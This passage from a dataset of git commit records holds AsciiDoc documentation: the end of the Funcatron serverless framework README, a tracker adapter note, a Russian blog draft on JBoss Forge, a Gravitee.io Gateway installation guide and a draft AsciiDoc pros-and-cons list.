The Func manager sends statistics back to the Trons\nand the Trons change Func allocation based on these statistics by\ncommunicating with the container orchestration substrate (Mesos, Kubernetes,\nSwarm) and changing the allocation of Func running containers.\n\nFrom the DevOps point of view: deploy a Func and it binds to the appropriate\nHTTP endpoint and scales to handle load.\n\n#### Debugging & Test Cases\n\nFuncatron logs a unique request ID and the SHA of the Func with every log line\nrelated to a request. This allows correlation of requests as they fan out through\na cluster.\n\nFuncatron allows dynamic changing log levels on a Func-by-Func basis which allows\ncapturing more information on demand.\n\nAll communications between the front end, Funcs, and back again are via well\ndefined JSON payloads. Funcatron allows capturing request and response\npayloads on a Func-by-Func basis (complete streams, or random sampling).\nThis data can be used for testing or debugging.\n\n### Architecture\n\nFuncatron has some ambitious goals... and has an architecture to facilitate\nachieving these goals.\n\nIn all but development mode, Funcatron runs on a Docker container orchestration\nsystem: Mesos, Kubernetes, or Docker Swarm. We call this the \"container\nsubstrate.\" Each of the Funcatron components can be scaled independently with\nmessages to the container substrate.\n\nFor HTTP requests, Funcatron uses Nginx and Lua (via the\nhttp:\/\/openresty.org\/en\/[OpenResty] project) to handle the HTTP requests.\nA small\nLua script encodes the request as a payload that's sent to a message broker\n(initially RabbitMQ, but this will be pluggable, e.g. Kafka, Redis). For large\nrequest or response bodies, there will be a direct connection between the Front End\nand the Runner.\nFor all but the highest volume installations, 2 Nginx instances\nshould be sufficient.\n\nBased on the combination of `host` and `pathPrefix` attributes in the Swagger\nmodule definition, the Tron enqueues the request on the appropriate queue.\n\nA Runner module dequeues messages from a number of host\/pathPrefix queues and\nforwards the request to the appropriate Func. The runner then takes the function\nreturn value and appropriately encodes it and places it on the reply queue which\ndequeued by the original endpoint.\n\nEach Func can run multiple modules. 
Based on queue depth, queue service time,\nand CPU usage stats from the Funcs, more runners can be allocated on the substrate,\nor more Funcs can be allocated across the runners.\n\nThe Lua scripts dequeues the response and turns in into an Nginx response.\n\nBecause all of the operation of the Funcs and Trons can be captured as messages\n(and all the messages are in JSON), it's possible to capture message streams for\ntesting and debugging purposes.\n\nEvery request has a unique ID and each log line includes the unique ID so it's\npossible to correlate a request as it moves across the cluster.\n\n[plantuml]\n----\nskinparam handwritten true\n\n\n() \"Upload\/Enable\" as Operator\n\n() \"HTTPS Proxy\" as Proxy\n\nnode \"Message Queue\" as MQ\n\npackage \"Public Facing\" {\n [Frontend]\n}\n\nnode {\n [Tron]\n [Runner]\n}\n\n\nProxy -> [Frontend] : \"HTTP port 80\"\n\n[Frontend] <--> MQ : Stomp\n\n[Tron] <--> MQ : AMQP\n\nNote left of [Frontend]: Multiple instances\n\n[Frontend] -> [Runner] : \"HTTP port 4000\"\n\n[Runner] -> [Tron] : \"HTTP port 3000\"\n\nNote left of [Runner] : Multiple instances\\nAuto-scaled\n\nNote left of [Tron] : One instance\n\nNote left of MQ : Cluster\n\nNote left of Operator : Access to control\\nFuncatron cluster\n\n\n[Runner] <--> MQ : AMQP\n\nOperator -> [Tron] : \"HTTP port 3000\"\n----\n\n#### Notes\n\nThe initial implementation uses Nginx\/OpenResty, RabbitMQ, Java\/Scala, and Mesos\nto support HTTP requests. This is not \"`hardcoded`\" but pluggable. Specifically:\n\n* Anything that can enqueue a payload and dequeue the response can\n work with the rest of Funcatron. The initial implementation is HTTP via\n Nginx\/OpenResty, but nothing in the rest of the system depends on what enqueues\n the request and dequeues the response.\n* RabbitMQ is the initial message broker, but it could be Kafka, Redis, or any other\n message broker. This is pluggable.\n* Initially, dispatch from Runners to Funcs will be Java\/Scala\/Kotlin classes. But the\n dispatch is also pluggable so other languages (Clojure) and\n runtimes (Python, NodeJS, Ruby\/Rails) will be supported.\n* \"`But Swagger is HTTP only`\" well... yes and no... the verb and the scheme are\n HTTP-specific, but they can be ignored... and by the time the request is\n dequeued by the Runner, the origin (HTTP or something else) of the message\n is irrelevant. The power of Swagger is two-fold:\n ** Excellent definitions of incoming and outgoing data shapes\n ** Great tooling and lots of general Swagger skills\n\nBecause everything in Funcatron is asynchronous messages, how the messages are\npassed, where the message originate and where responses are dequeued are all\npluggable and irrelevant to the other parts of the system.\n\nThe key idea in Funcatron is the Func is a well defined bundle of functionality\nthat's associated with a particular message signature that maps to well HTTP via\nhost, pathPrefix, path, and verb, but could map to something else.\n\nIt may be possible to chain Func invocations. I don't yet have a concrete\ndesign, but rather than enqueuing a Func return value as a response, it may\nbe possible to package it as a request (the request body contains the Func\nreturn value) and forwarding it to another Func for further processing.\n\nFinally, if there's no `reply-to` field in a message, the Func is applied (invoked)\nbut the results are discarded. 
This allows for side effects from the Func\nrather than just computation.\n\n\n### Contributing\n\nPlease see https:\/\/github.com\/funcatron\/tron\/blob\/master\/CONTRIBUTING.md[CONTRIBUTING] for details on\nhow to make a contribution.\n\n### Licenses and Support\n\nFuncatron is licensed under an Apache 2 license.\n\nSupport is available from the project's founder,\n[David Pollak](mailto:feeder.of.the.bears@gmail.com).\n\n\n== Documentation Versions\n\n$$VERSIONLIST$$\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"edc249669dae3ca4a1d6746df65db2ebdb4513a8","subject":"Fix documentation","message":"Fix documentation\n","repos":"qarea\/jirams,qarea\/jirams","old_file":"doc\/narada-base-tracker-adapter.adoc","new_file":"doc\/narada-base-tracker-adapter.adoc","new_contents":"= Narada tracker adapter base\n\nThis project based on https:\/\/gitlab.qarea.org\/tgms\/narada-tgms-base\/tree\/master\n\n== Additions\/changes to base project\n\n=== migrate\n\n* Add httptimeout configuration for requests to remote services\n\n=== entities package\n\n* Package provides required entities structure and needed errors for adapter\n\n=== api\/rpcsvc package\n\n* Implements all needed JSONRPC2 api calls and provide interface for adapter client\n\n=== MySQL\n\n* Removed all MySQL related files, if you need one - take it from narada-tgms-base\n","old_contents":"Narada tracker adapter base\n================\n\nThis project based on https:\/\/gitlab.qarea.org\/tgms\/narada-tgms-base\/tree\/master\n\n== Additions\/changes to base project\n\n=== migrate\n\n* Add httptimeout configuration for requests to remote services\n\n=== entities package\n\n* Package provides required entities structure and needed errors for adapter\n\n=== api\/rpcsvc package\n\n* Implements all needed JSONRPC2 api calls and provide interface for adapter client\n\n=== MySQL\n\n* Removed all MySQL related files, if you need one - take it from narada-tgms-base\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"db043cc6f782697c25b17fdd91d921ad7d3c5553","subject":"Update 2016-05-17-Kuznya-a-ved-udobno-JBoss-Forge-pretty-sweet.adoc","message":"Update 2016-05-17-Kuznya-a-ved-udobno-JBoss-Forge-pretty-sweet.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2016-05-17-Kuznya-a-ved-udobno-JBoss-Forge-pretty-sweet.adoc","new_file":"_posts\/2016-05-17-Kuznya-a-ved-udobno-JBoss-Forge-pretty-sweet.adoc","new_contents":"= \u041a\u0443\u0437\u043d\u044f, \u0430 \u0432\u0435\u0434\u044c \u0443\u0434\u043e\u0431\u043d\u043e { JBoss Forge, pretty sweet }\n:hp-tags: \u043f\u043e\u043b\u0435\u0437\u043d\u044f\u0448\u043a\u0438, \u0447\u0435\u0440\u043d\u043e\u0432\u0438\u043a\n\n\u041f\u0440\u043e\u0431\u0443\u044e \u043f\u043e \u043a\u043d\u0438\u0436\u043a\u0435 \u043f\u043e\u043a\u0430\u0447\u0430\u0442\u044c\u0441\u044f \u0434\u043e \u0431\u0435\u0441\u043f\u0440\u0435\u0440\u044b\u0432\u043d\u043e\u0439 \u0438\u043d\u0442\u0435\u0433\u0440\u0430\u0446\u0438\u0438 http:\/\/bit.ly\/1XLMRZZ[Continuous Enterprise Development in Java _by Andrew Lee Rubinger, Aslak Knutsen_] . \u0418 \u0432\u043e\u0442 \u0442\u0430\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043a\u0443\u0437\u043d\u044f. \u0421\u0442\u043e\u043b\u044c\u043a\u043e \u0440\u0443\u0442\u0438\u043d\u044b \u0443\u0436\u0435 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043d\u043e. 
\u0412\u0435\u0434\u044c \u0443\u0434\u043e\u0431\u043d\u043e. \u041d\u0430\u0434\u043e \u043f\u043e\u043a\u043e\u043f\u0430\u0442\u044c \u0434\u0430\u043b\u044c\u0448\u0435. \u0422\u0443\u0442 \u0432\u0435\u0434\u044c \u0438 \u0442\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0438\u043d\u0442\u0435\u0433\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0435 \u0443\u0434\u043e\u0431\u043d\u0435\u0435. \u041d\u0443 \u0442.\u0435. \u0440\u0430\u0441\u043f\u0438\u0441\u0430\u043d\u043e \u043a\u0430\u043a \u0441\u0434\u0435\u043b\u0430\u0442\u044c.\n\n*\u0427\u0442\u043e \u043f\u043e\u043d\u0440\u0430\u0432\u0438\u043b\u043e\u0441\u044c:*\n\n . \u041e\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0448\u044c \u043f\u043e\u0447\u0442\u0438 \u0447\u0435\u043b\u043e\u0432\u0435\u0447\u0435\u0441\u043a\u0438\u043c \u044f\u0437\u044b\u043a\u043e\u043c\n . \u0418\u043d\u043a\u0440\u0435\u043c\u0435\u043d\u0442\u0430\u043b\u044c\u043d\u043e\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u043f\u0440\u043e\u0435\u043a\u0442\u0430\n . \u0414\u043e\u0432\u043e\u043b\u044c\u043d\u043e \u0442\u043e\u043d\u043a\u0430\u044f \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0430\n . \u0412\u044b\u0431\u043e\u0440 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0439 \u0438\u0444\u0440\u0435\u0439\u043c\u0432\u043e\u0440\u043a\u043e\u0432\n . \u0425\u043e\u0440\u043e\u0448\u0430\u044f \u043f\u043e\u0434\u0441\u043a\u0430\u0437\u043a\u0430 \u043f\u043e <TAB>, \u043f\u043e \u043d\u0435\u0439 \u0432 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u043c \u0438 \u0443\u0447\u0443\u0441\u044c.\n . \u041f\u043e \u043f\u0440\u043e\u0435\u043a\u0442\u0443 \u0433\u0443\u043b\u044f\u0435\u0448\u044c \u043a\u0430\u043a \u043f\u043e \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0435 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u043e\u0432 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435, \u0442\u0435 \u043f\u043e\u043b\u043e\u0432\u0438\u043d\u0430 \u043a\u043e\u043c\u0430\u043d\u0434 \u0443\u0436\u0435 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u0442\u0441\u044f \u0437\u043d\u0430\u0435\u0448\u044c.\n\n*\u041d\u0435 \u043f\u043e\u043d\u0440\u0430\u0432\u0438\u043b\u043e\u0441\u044c:*\n_\u041f\u043e \u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0443\u0447\u0443\u0441\u044c \u043f\u043e \u043a\u043d\u0438\u0433\u0435, \u0442\u043e \u043a\u043d\u0438\u0433\u0430 \u0443\u0441\u0442\u0430\u0440\u0435\u043b\u0430. \u041d\u043e \u0438 \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0439 \u0441\u0430\u0439\u0442 \u0442\u043e\u0436\u0435 \u0443\u0441\u0442\u0430\u0440\u0435\u043b. \u041f\u0440\u0438\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u0438\u0434\u0442\u0438 \u043f\u043e\u0447\u0442\u0438 \u0432 \u0441\u043b\u0435\u043f\u0443\u044e. \u0412 \u043a\u043d\u0438\u0433\u0435 \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0432\u0435\u0440\u0441\u0438\u044f 1 \u0438\u043b\u0438 2, \u043d\u0430 \u0441\u0430\u0439\u0442\u0435 \u0432\u0435\u0440\u0441\u0438\u044f 3. \u0422\u043e \u0447\u0442\u043e \u0441\u043a\u0430\u0447\u0430\u043b\u043e\u0441\u044c jboss IDE \u0442\u0430\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f 3.0.1 \u043a\u0430\u0436\u0435\u0442\u0441\u044f. 
\u0418 \u043e\u043d\u043e \u043e\u0442\u043b\u0438\u0447\u0430\u0435\u0442\u0441\u044f \u043e\u0442 \u0432\u0435\u0440\u0441\u0438\u0438 3, \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u044e\u0442 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0441\u0432\u043e\u0439\u0441\u0442\u0432\u0430._\n \n . \u0425\u043e\u0442\u044c \u044f \u0438 \u0432\u044b\u0431\u0440\u0430\u043b scaffolding faces 2.2, \u043a\u043e\u0433\u0434\u0430 \u0441\u0433\u0435\u043d\u0435\u0440\u0438\u0440\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u0432\u044c\u044e\u0445\u0438, \u0442\u0430\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f JSTL! \u0425\u043e\u0442\u044f \u0438 BalusC \u0438 \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0439 Oracle, \u043a\u0430\u0436\u0435\u0442\u0441\u044f, \u0443\u0436\u0435 \u0433\u043e\u0432\u043e\u0440\u044f\u0442 \u0432 \u0444\u0435\u0439\u0441\u0430\u0445 \u0437\u0430\u0431\u0443\u0434\u044c\u0442\u0435 \u043f\u0440\u043e JSTL. \u0422\u0430\u043c \u0441\u0432\u043e\u0451 \u0443\u0436\u0435 \u0435\u0441\u0442\u044c, \u0442\u043e \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0439\u0442\u0435.\n \n[NOTE]\n====\n\u0412\u043e\u0442 \u0442\u0443\u0442 \u043d\u0430\u043a\u043e\u043d\u0435\u0446, \u044f \u043d\u0430\u0448\u0435\u043b \u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u044b\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u043a\u0443\u0437\u043d\u0438 http:\/\/forge.jboss.org\/document\/hands-on-lab\n====\n","old_contents":"= \u041a\u0443\u0437\u043d\u044f, \u0430 \u0432\u0435\u0434\u044c \u0443\u0434\u043e\u0431\u043d\u043e. (JBoss Forge)\n:hp-tags: \u043f\u043e\u043b\u0435\u0437\u043d\u044f\u0448\u043a\u0438, \u0447\u0435\u0440\u043d\u043e\u0432\u0438\u043a\n\n\u041f\u0440\u043e\u0431\u0443\u044e \u043f\u043e \u043a\u043d\u0438\u0436\u043a\u0435 \u043f\u043e\u043a\u0430\u0447\u0430\u0442\u044c\u0441\u044f \u0434\u043e \u0431\u0435\u0441\u043f\u0440\u0435\u0440\u044b\u0432\u043d\u043e\u0439 \u0438\u043d\u0442\u0435\u0433\u0440\u0430\u0446\u0438\u0438 http:\/\/bit.ly\/1XLMRZZ[Continuous Enterprise Development in Java _by Andrew Lee Rubinger, Aslak Knutsen_] . \u0418 \u0432\u043e\u0442 \u0442\u0430\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043a\u0443\u0437\u043d\u044f. \u0421\u0442\u043e\u043b\u044c\u043a\u043e \u0440\u0443\u0442\u0438\u043d\u044b \u0443\u0436\u0435 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043d\u043e. \u0412\u0435\u0434\u044c \u0443\u0434\u043e\u0431\u043d\u043e. \u041d\u0430\u0434\u043e \u043f\u043e\u043a\u043e\u043f\u0430\u0442\u044c \u0434\u0430\u043b\u044c\u0448\u0435. \u0422\u0443\u0442 \u0432\u0435\u0434\u044c \u0438 \u0442\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0438\u043d\u0442\u0435\u0433\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0435 \u0443\u0434\u043e\u0431\u043d\u0435\u0435. \u041d\u0443 \u0442.\u0435. \u0440\u0430\u0441\u043f\u0438\u0441\u0430\u043d\u043e \u043a\u0430\u043a \u0441\u0434\u0435\u043b\u0430\u0442\u044c.\n\n*\u0427\u0442\u043e \u043f\u043e\u043d\u0440\u0430\u0432\u0438\u043b\u043e\u0441\u044c:*\n\n . \u041e\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0448\u044c \u043f\u043e\u0447\u0442\u0438 \u0447\u0435\u043b\u043e\u0432\u0435\u0447\u0435\u0441\u043a\u0438\u043c \u044f\u0437\u044b\u043a\u043e\u043c\n . 
\u0418\u043d\u043a\u0440\u0435\u043c\u0435\u043d\u0442\u0430\u043b\u044c\u043d\u043e\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u043f\u0440\u043e\u0435\u043a\u0442\u0430\n . \u0414\u043e\u0432\u043e\u043b\u044c\u043d\u043e \u0442\u043e\u043d\u043a\u0430\u044f \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0430\n . \u0412\u044b\u0431\u043e\u0440 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0439 \u0438\u0444\u0440\u0435\u0439\u043c\u0432\u043e\u0440\u043a\u043e\u0432\n . \u0425\u043e\u0440\u043e\u0448\u0430\u044f \u043f\u043e\u0434\u0441\u043a\u0430\u0437\u043a\u0430 \u043f\u043e <TAB>, \u043f\u043e \u043d\u0435\u0439 \u0432 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u043c \u0438 \u0443\u0447\u0443\u0441\u044c.\n . \u041f\u043e \u043f\u0440\u043e\u0435\u043a\u0442\u0443 \u0433\u0443\u043b\u044f\u0435\u0448\u044c \u043a\u0430\u043a \u043f\u043e \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0435 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u043e\u0432 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435, \u0442\u0435 \u043f\u043e\u043b\u043e\u0432\u0438\u043d\u0430 \u043a\u043e\u043c\u0430\u043d\u0434 \u0443\u0436\u0435 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u0442\u0441\u044f \u0437\u043d\u0430\u0435\u0448\u044c.\n\n*\u041d\u0435 \u043f\u043e\u043d\u0440\u0430\u0432\u0438\u043b\u043e\u0441\u044c:*\n_\u041f\u043e \u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0443\u0447\u0443\u0441\u044c \u043f\u043e \u043a\u043d\u0438\u0433\u0435, \u0442\u043e \u043a\u043d\u0438\u0433\u0430 \u0443\u0441\u0442\u0430\u0440\u0435\u043b\u0430. \u041d\u043e \u0438 \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0439 \u0441\u0430\u0439\u0442 \u0442\u043e\u0436\u0435 \u0443\u0441\u0442\u0430\u0440\u0435\u043b. \u041f\u0440\u0438\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u0438\u0434\u0442\u0438 \u043f\u043e\u0447\u0442\u0438 \u0432 \u0441\u043b\u0435\u043f\u0443\u044e. \u0412 \u043a\u043d\u0438\u0433\u0435 \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0432\u0435\u0440\u0441\u0438\u044f 1 \u0438\u043b\u0438 2, \u043d\u0430 \u0441\u0430\u0439\u0442\u0435 \u0432\u0435\u0440\u0441\u0438\u044f 3. \u0422\u043e \u0447\u0442\u043e \u0441\u043a\u0430\u0447\u0430\u043b\u043e\u0441\u044c jboss IDE \u0442\u0430\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f 3.0.1 \u043a\u0430\u0436\u0435\u0442\u0441\u044f. \u0418 \u043e\u043d\u043e \u043e\u0442\u043b\u0438\u0447\u0430\u0435\u0442\u0441\u044f \u043e\u0442 \u0432\u0435\u0440\u0441\u0438\u0438 3, \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u044e\u0442 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0441\u0432\u043e\u0439\u0441\u0442\u0432\u0430._\n \n . \u0425\u043e\u0442\u044c \u044f \u0438 \u0432\u044b\u0431\u0440\u0430\u043b scaffolding faces 2.2, \u043a\u043e\u0433\u0434\u0430 \u0441\u0433\u0435\u043d\u0435\u0440\u0438\u0440\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u0432\u044c\u044e\u0445\u0438, \u0442\u0430\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f JSTL! \u0425\u043e\u0442\u044f \u0438 BalusC \u0438 \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0439 Oracle, \u043a\u0430\u0436\u0435\u0442\u0441\u044f, \u0443\u0436\u0435 \u0433\u043e\u0432\u043e\u0440\u044f\u0442 \u0432 \u0444\u0435\u0439\u0441\u0430\u0445 \u0437\u0430\u0431\u0443\u0434\u044c\u0442\u0435 \u043f\u0440\u043e JSTL. 
\u0422\u0430\u043c \u0441\u0432\u043e\u0451 \u0443\u0436\u0435 \u0435\u0441\u0442\u044c, \u0442\u043e \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0439\u0442\u0435.\n \n[NOTE]\n====\n\u0412\u043e\u0442 \u0442\u0443\u0442 \u043d\u0430\u043a\u043e\u043d\u0435\u0446, \u044f \u043d\u0430\u0448\u0435\u043b \u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u044b\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u043a\u0443\u0437\u043d\u0438 http:\/\/forge.jboss.org\/document\/hands-on-lab\n====\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"072391e26a53823a78d9d5543311d78d19d5bd50","subject":"Internal link typo","message":"Internal link typo\n","repos":"gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs","old_file":"pages\/apim\/installation-guide\/installation-guide-gateway.adoc","new_file":"pages\/apim\/installation-guide\/installation-guide-gateway.adoc","new_contents":"= Gateway\n:page-sidebar: apim_sidebar\n:page-permalink: apim_installguide_gateway.html\n:page-folder: apim\/installation-guide\n\n== System Requirements\n\n=== JDK\n\nGravitee.io Gateway requires at least Java 8. Before you install Gravitee.io Gateway, please check your Java version :\n\n[source,bash]\n----\njava -version\necho $JAVA_HOME\n----\n\nNOTE: You can download the latest JDK from the http:\/\/www.oracle.com\/technetwork\/java\/javase\/downloads\/index.html[Oracle Java SE Download Site].\n\n=== Datastore\n\nDefault Gravitee.io Gateway distribution requires MongoDB 3.x to store management and configuration data and Elasticsearch 2.x to store\nreporting \/ analytics.\n\nNOTE: You can download MongoDB 3.x from the https:\/\/www.mongodb.org\/downloads#production[MongoDB Download Site]\nand Elasticsearch 2.x from the https:\/\/www.elastic.co\/downloads\/elasticsearch[Elastic Download Site]\n\nWARNING: Gravitee.io is not yet compatible with Elasticsearch 5.x. 
See https:\/\/github.com\/gravitee-io\/issues\/issues\/387[ES 5.x support issue].\n\n== Installing from the ZIP archive\n\nBinaries are available from https:\/\/gravitee.io\/downloads\/full-stack\/latest\/[Downloads page] or via https:\/\/dl.bintray.com\/gravitee-io\/release\/GRAVITEEIO-VERSION\/graviteeio-full-GRAVITEEIO-VERSION.zip[Bintray].\n\n[source,bash]\n[subs=\"attributes\"]\n$ curl -L https:\/\/dl.bintray.com\/gravitee-io\/release\/GRAVITEEIO-VERSION\/:graviteeio-full-GRAVITEEIO-VERSION.zip -o gravitee-standalone-distribution-GRAVITEEIO-VERSION.zip\n\nOnce the file has been downloaded, you just have to unpack it in the right place.\n\n[source,bash]\n[subs=\"attributes\"]\n$ unzip gravitee-standalone-distribution-GRAVITEEIO-VERSION.zip\n\nAnd you can simply start up the gateway as follows:\n\n[source,bash]\n[subs=\"attributes\"]\n$ cd graviteeio-gateway-GRAVITEEIO-VERSION\n$ .\/bin\/gravitee\n\nIf everything goes well, you should see logs like these:\n\n[source,bash]\n[subs=\"attributes\"]\n...\n20:55:42.097 [gravitee] INFO i.g.g.s.vertx.VertxEmbeddedContainer - Starting Vertx container and deploy Gravitee Verticles\n20:55:42.108 [gravitee] INFO i.g.g.s.v.GraviteeVerticleFactory - Creating a new instance of Gravitee Verticle\n20:55:42.167 [gravitee] INFO i.g.g.standalone.node.GatewayNode - Gravitee.io - Gateway [id: 9c31b9cc-f779-4f2d-b1b9-ccf779df2df5 - version: GRAVITEEIO-VERSION (build: XXXX) revision#XXXX] started in 3871 ms.\n...\n\nBy default, the gateway listens on port *8082* and can be accessed at: _http:\/\/localhost:8082_\n\n\nThe HTTP port can be <<apim_installguide_configuration.adoc#http_server, configured>> if necessary.\n\n== Directory structure\n\nAfter successfully installing Gravitee.io Gateway, the `graviteeio-gateway` directory looks like this:\n\n[width=\"100%\",cols=\"20%,80%\",frame=\"topbot\",options=\"header\"]\n|======================\n|Folder |Description\n|bin |Startup\/shutdown scripts\n|config |<<apim_installguide_configuration.adoc#gravitee-gateway-configuration, Configuration>> folder (application, logs and cache configuration)\n|lib |Libraries (gravitee.io and third-party libraries)\n|logs |Gateway log files\n|plugins |Gateway <<apim_overview_plugins.adoc#, plugins>>\n|======================\n\n","old_contents":"= Gateway\n:page-sidebar: apim_sidebar\n:page-permalink: apim_installguide_gateway.html\n:page-folder: apim\/installation-guide\n\n== System Requirements\n\n=== JDK\n\nGravitee.io Gateway requires at least Java 8. Before you install Gravitee.io Gateway, please check your Java version :\n\n[source,bash]\n----\njava -version\necho $JAVA_HOME\n----\n\nNOTE: You can download the latest JDK from the http:\/\/www.oracle.com\/technetwork\/java\/javase\/downloads\/index.html[Oracle Java SE Download Site].\n\n=== Datastore\n\nDefault Gravitee.io Gateway distribution requires MongoDB 3.x to store management and configuration data and Elasticsearch 2.x to store\nreporting \/ analytics.\n\nNOTE: You can download MongoDB 3.x from the https:\/\/www.mongodb.org\/downloads#production[MongoDB Download Site]\nand Elasticsearch 2.x from the https:\/\/www.elastic.co\/downloads\/elasticsearch[Elastic Download Site]\n\nWARNING: Gravitee.io is not yet compatible with Elasticsearch 5.x. 
See https:\/\/github.com\/gravitee-io\/issues\/issues\/387[ES 5.x support issue].\n\n== Installing from the ZIP archive\n\nBinaries are available from https:\/\/gravitee.io\/downloads\/full-stack\/latest\/[Downloads page] or via https:\/\/dl.bintray.com\/gravitee-io\/release\/GRAVITEEIO-VERSION\/graviteeio-full-GRAVITEEIO-VERSION.zip[Bintray].\n\n[source,bash]\n[subs=\"attributes\"]\n$ curl -L https:\/\/dl.bintray.com\/gravitee-io\/release\/GRAVITEEIO-VERSION\/:graviteeio-full-GRAVITEEIO-VERSION.zip -o gravitee-standalone-distribution-GRAVITEEIO-VERSION.zip\n\nOnce file has been downloaded, you just have to unpack it in the right place.\n\n[source,bash]\n[subs=\"attributes\"]\n$ unzip gravitee-standalone-distribution-GRAVITEEIO-VERSION.zip\n\nAnd you can simply start up the gateway as follow:\n\n[source,bash]\n[subs=\"attributes\"]\n$ cd graviteeio-gateway-GRAVITEEIO-VERSION\n$ .\/bin\/gravitee\n\nIf everything goes well, you should see this kind of logs:\n\n[source,bash]\n[subs=\"attributes\"]\n...\n20:55:42.097 [gravitee] INFO i.g.g.s.vertx.VertxEmbeddedContainer - Starting Vertx container and deploy Gravitee Verticles\n20:55:42.108 [gravitee] INFO i.g.g.s.v.GraviteeVerticleFactory - Creating a new instance of Gravitee Verticle\n20:55:42.167 [gravitee] INFO i.g.g.standalone.node.GatewayNode - Gravitee.io - Gateway [id: 9c31b9cc-f779-4f2d-b1b9-ccf779df2df5 - version: GRAVITEEIO-VERSION (build: XXXX) revision#XXXX] started in 3871 ms.\n...\n\nBy default, the gateway is listening on port *8082* and can be accessed from: _http:\/\/localhost:8082_\n\n\nHTTP port can be <<apim_installguide_configuration.adoc#http_server, configured>> if necessary.\n\n== Directory structure\n\nAfter successfully installed Gravitee.io Gateway, the `graviteeio-gateway` directory looks like this:\n\n[width=\"100%\",cols=\"20%,80%\",frame=\"topbot\",options=\"header\"]\n|======================\n|Folder |Description\n|bin |Startup\/shutdown scripts\n|config |<<apim_installguide_configuration.adoc#gravitee-gateway-configuration, Configuration>> folder (application, logs and cache configuration)\n|lib |Libraries (gravitee.io libraries and third parties library)\n|logs |Gateway log files\n|plugins |Gateway <<apim_overview_plugins.adoc, plugins>>\n|======================\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c3d3e2278aab342df1ba3422aefb3018dbbcef86","subject":"Add some more asciidoc pros","message":"Add some more asciidoc pros\n","repos":"jeaye\/jeaye.github.io,jeaye\/jeaye.github.io","old_file":"_drafts\/asciidoc.adoc","new_file":"_drafts\/asciidoc.adoc","new_contents":"== Pros\n\n* Multiline support (table cells, list elements, etc)\n* Code references\n* Styling without html\n* Github support\n* Conversion to other formats\n\n== Cons\n\n* Vim support is worse\n* Source blocks are harder to write\n* Bulleted lists are spaced more apart https:\/\/github.com\/asciidoctor\/asciidoctor\/issues\/1087\n\n== Notes\n\n* Vim highlighting and link following\n* Jekyll plugin necessary\n","old_contents":"== Pros\n\n* Multiline support (table cells, list elements, etc)\n* Code references\n* Styling without html\n\n== Cons\n\n* 